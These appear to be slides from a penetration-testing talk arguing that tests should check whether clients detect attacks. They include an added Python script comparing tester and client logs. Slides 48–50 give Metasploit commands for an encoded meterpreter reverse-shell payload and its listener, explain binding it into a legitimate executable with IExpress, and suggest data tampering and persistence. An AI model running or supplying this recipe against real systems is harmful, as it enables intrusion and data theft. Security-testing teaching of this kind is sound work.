3. Introduction / Scope
Are clients aware of attacks happening to
them?
If they are not, how can we help them?
How can we test if they are aware of an attack?
4. Remediation of an Attack
Remediation -
Step One -
Fixing the vulnerability that was exploited
Step Two -
Dealing with what happened post exploitation
5. Case Study
Lush.co.uk
They found out about the attack at the end of
January
Stated that the attack started, “they think”, on
the 4th of October
6. Case Study cont.
Zurich UK
Lost 46,000 Customer Records
Found out 1 year later
Cost £2.28 million in fines - not to mention the cost of fixing it
7. Case Study cont.
Chain of events -
When did it start?
When did it end?
What information was available to the attacker?
What information was compromised?
Not counting -
How it happened.
How to stop it from happening again.
8. What am I saying?
Yes -
If they knew about the vulnerability in the first place
they could have stopped this from happening.
But they didn’t -
The attack happened and it has cost them money,
not just to fix the vulnerability but to work through
the whole chain of events too.
9. Attacks we see
Layer 8 (Management)
Development Issues
0-Days
Passive Actions / Obfuscation Methods
10. Attacks we see cont.
These attacks are what we are seeing at the
moment.
When we do testing for clients we stop at the
vulnerability.
We stop at the exploit and we do not carry on.
11. Attacks we see cont.
Stopping at the vulnerability means -
The client gets to do Step One of remediation
What about Step Two?
12. It is important!!!
Without the proper things in place it can take
a long time to fix this.
[Chart: time to detection by how the breach was discovered - Self Detection, Law Enforcement, Public Detection, Regulatory Detection; axis 0 to 200]
13. Why didn’t they know?
There are a lot of things in place at the
moment that help people detect attacks / even
stop them.
IDS / IPS / FW / Logs etc.
Attacks are still occurring and we are still
hearing about them all the time.
14. Why didn’t they know? cont.
Do we test this in our pen test?
How can we test if they are aware of an
attack?
Certainly not by just exploiting the
vulnerability; we have to dig deeper.
31. IR
Not all companies have IR teams
How long does it take for the attacker’s trail to
be found?
32. Knowing you have been compromised = good
When and how long for = better
33. Reporting
When it comes to the report, attack them with
simulated examples - examples you could
recreate.
Could you kill someone?
Can you steal money?
Can you change / recreate their product?
34. Report cont.
Give a time window / speak to only one person
Document everything you do
Ask them what they saw you do
Compare
35. Did they know?
Did they know you were attacking them?
If so did they try to stop you?
If not why not!
37. Noise Levels
Low -
Ninja Hacking Skillz
Medium -
Make a few mistakes that should be detected
High -
Scan them to hell and back
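A worked version of the Compare step from the Report slide (document everything you do, ask them what they saw, compare), as an added example that is not code from the original talk: it pairs the tester's own timeline, with each action tagged by the noise level it was carried out at, against the client's detection records, and reports what was seen, how long it took, and which noise tier went unnoticed. The hosts, timestamps, actions and observations are constructed sample data, and the matching rule (earliest client observation of the same target at or after the action, each observation used once) is an assumption for illustration.

```python
"""Compare the tester's own activity log with what the client reported seeing.

Added example for the "Document / Ask / Compare" steps; not code from the
original talk. All log entries below are constructed sample data.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

TS = "%Y-%m-%d %H:%M"


def t(s: str) -> datetime:
    return datetime.strptime(s, TS)


@dataclass
class TesterAction:
    when: datetime
    noise: str    # low / medium / high, the tiers from the Noise Levels slide
    action: str
    target: str


@dataclass
class ClientObservation:
    when: datetime
    source: str   # which control saw it: IDS, FW, SIEM, helpdesk ...
    target: str
    note: str


@dataclass
class DetectionResult:
    action: TesterAction
    seen_by: Optional[ClientObservation]
    latency: Optional[timedelta]


# Constructed: what the tester did ("document everything you do")
TESTER_LOG = [
    TesterAction(t("2011-03-01 09:00"), "high",   "nmap -sS -p- full port scan", "10.0.0.5"),
    TesterAction(t("2011-03-01 10:30"), "medium", "20 failed logins as admin", "10.0.0.5"),
    TesterAction(t("2011-03-01 11:15"), "low",    "mail with bound payload.exe", "ceo-laptop"),
    TesterAction(t("2011-03-01 11:40"), "low",    "meterpreter reverse_tcp callback", "ceo-laptop"),
    TesterAction(t("2011-03-01 12:10"), "low",    "new local admin for persistence", "ceo-laptop"),
]

# Constructed: what the client says they saw ("ask them what they saw you do")
CLIENT_LOG = [
    ClientObservation(t("2011-03-01 09:05"), "IDS", "10.0.0.5", "port sweep alert"),
    ClientObservation(t("2011-03-02 08:00"), "helpdesk", "10.0.0.5", "admin account locked out"),
]


def match_detections(tester_log, client_log):
    """Pair each action with the earliest observation of the same target at or
    after the action (assumed matching rule); each observation is used once."""
    free = sorted(client_log, key=lambda o: o.when)
    results = []
    for act in sorted(tester_log, key=lambda a: a.when):
        hit = next((o for o in free if o.target == act.target and o.when >= act.when), None)
        if hit is not None:
            free.remove(hit)
            results.append(DetectionResult(act, hit, hit.when - act.when))
        else:
            results.append(DetectionResult(act, None, None))
    return results


def summarize(results):
    """Answer the slides' questions: did they know, and how long did it take?"""
    detected = [r for r in results if r.seen_by is not None]
    by_noise = {}
    for r in results:
        seen, total = by_noise.get(r.action.noise, (0, 0))
        by_noise[r.action.noise] = (seen + int(r.seen_by is not None), total + 1)
    mean_latency = (sum(r.latency.total_seconds() for r in detected) / 60 / len(detected)
                    if detected else None)
    first_action = min(r.action.when for r in results)
    first_seen = min((r.seen_by.when for r in detected), default=None)
    return {
        "detected": len(detected),
        "total": len(results),
        "missed": [r.action.action for r in results if r.seen_by is None],
        "by_noise": by_noise,
        "mean_latency_minutes": mean_latency,
        "time_to_first_detection_minutes": (
            (first_seen - first_action).total_seconds() / 60 if first_seen else None),
    }


if __name__ == "__main__":
    results = match_detections(TESTER_LOG, CLIENT_LOG)
    for r in results:
        status = f"seen by {r.seen_by.source} after {r.latency}" if r.seen_by else "NOT SEEN"
        print(f"{r.action.when:%H:%M} [{r.action.noise:6}] {r.action.action:34} {status}")
    print(summarize(results))
```

With the sample data the high-noise scan is seen within minutes, the medium-noise mistake only surfaces the next day as a helpdesk ticket, and nothing at the low tier is seen at all, which is exactly the per-tier picture the report should put in front of the client.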
43. Example
So what are we actually talking about?
How can we go about simulating an attack
like the one we have just spoken about?
44. Ask and you shall receive
Brief
Discuss options for testing
What is important to them?
45. Seek and you will find
What was important to them?
Are there any exploits / 0-days for that piece of
software?
46. Knock and the door will be
opened
Simply put: do not give up
There is always going to be some avenue of
attack for this client; they may just not know
about it
Look at the following example
47. Attacking Layer 8
Idiots in the company are your first port of
call.
Is the CEO an idiot?
Skype is important to them - attack them with
what is important!
48. Attacking Layer 8 cont.
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o payload.exe
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit
(LHOST is the tester’s own listening address, written with no spaces around “=”; R tells msfpayload to emit the raw payload for msfencode, and -c 5 runs five encoding passes. msfpayload and msfencode have since been merged into msfvenom, and shikata_ga_nai output is well known to AV, but the workflow is the same.)
49. Attacking Layer 8 cont.
Using IExpress (the package wizard that ships with Windows) you can bind a legitimate .exe
and your payload together in one package
Settings available in IExpress
Running that evil .exe (BANG) reverse shell!
50. Do not leave it there!
What did I say at the beginning?
Once you have a shell, do something with it so
that it actually means something to them
Delete data / change data / get addresses /
create ways to stay there!
51. But WAIT!!! POLITICS!
You cannot just delete data without
permission!
Make sure you find out what you are allowed to do!
59. WHAT IS ALL THIS!
By simulating these attacks the way I am
talking about, the client can then see exactly
what they would need to do if it was a real
attack!
60. Future
@sponex and I are creating a website about
this and some guides that link to some good
methodologies out there.
61. Summary
Attack them, don’t pussyfoot around!
Find out what they care about.
Make them realise how hard it would be to
fix.
62. :~$ whoami
Director of upSploit Limited
Soon to be Web Application Security Consultant for Trustwave
British Student
Podcaster